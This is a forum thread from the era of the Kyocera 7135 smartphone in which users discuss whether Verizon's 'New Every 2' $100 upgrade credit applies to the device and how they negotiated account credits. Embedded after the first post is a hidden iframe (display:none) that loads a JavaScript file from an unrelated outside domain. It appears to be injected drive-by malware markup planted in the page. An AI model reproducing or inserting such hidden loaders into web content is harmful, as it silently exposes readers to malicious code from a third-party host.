+ Reply to Thread

Verizon New Every 2 Apply to 7135?

I've held off buying the 7135 directly from Kyocera b/c I'm eligible for Verizon's new every 2 $100 rebate. However, I just spoke with my Verizon rep and he told me that this offer doesn't always apply to data capable devices -- the Thera is an example of this. He is waiting for clarification (and so is his supervisor) on whether the 7135 will be eligible for the New Every 2 rebate.

Has anyone else heard anything from their respective Verizon stores/reps on whether the $100 New Every 2 rebate will apply?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

My reps here tell me I'll eligible for the $100 off the 7135. Of course they were not aware of the press release either.

jeh
    What is "New Every 2"? Never heard of it.

If you've had a contract with Verizon for at least 2 years on a rate plan of $35 or more a month, you can get $100 off any new phone when you renew your contract.

When I got my 7135 from getconnected.com last month, Verizon gave me a $100 credit for being on the New Every Two paln with my 6035.

It's a credit for being on the plan, either on the price of a phone, or credit to your account.
    Be polite, and business like when you request it.

jeh
    /me wonders if a one-year contract that expired and I've maintained month-to-month for a year after it expired would count

Yea verily, polite and business-like.

But I don't suppose it would hurt to have AT&T Wireless, Treo 300, Sony T68i, etc., brochures sticking out from my portfolio flap.

I called and they said that yes NE2 would apply - but you cannot get any other $ off if you use NE2 - so if there is a $100 rebate - you get either the $100 for the NE2 or $100 for the rebate - but not both....

So if no rebate (although it is expected that there will be a $100 rebate) then the NE2 would be a good deal. Otherwise it will not matter.

I think if you are out of contract, if you reup for 2 yrs you get the $100 off. However, you can only take advantage of the deal once every two years.....

my last phone was a NE2 phone....

Just wanted to share my verizon activation experience for those of you who do not have a calling plan yet. I purchased a phone for my wife and activated her phone as well as my 7135 at the same time. The salesperson wanted to talk me into a 2 year contract on my wife's phone for a rebate, which was fine. I then told her I would be willing to sign my 7135 up on a two year contract if there were incentive to do so, and negotiated a $100 credit to my account. She had to check, made a call and I got my $100 credit. I suspect she didn't realize Verizon was the only company I could get service for the 7135.

I think I was a little lucky, but it certainly doesn't hurt to ask

Hope you newcomers enjoy your new phones.

falstaffpac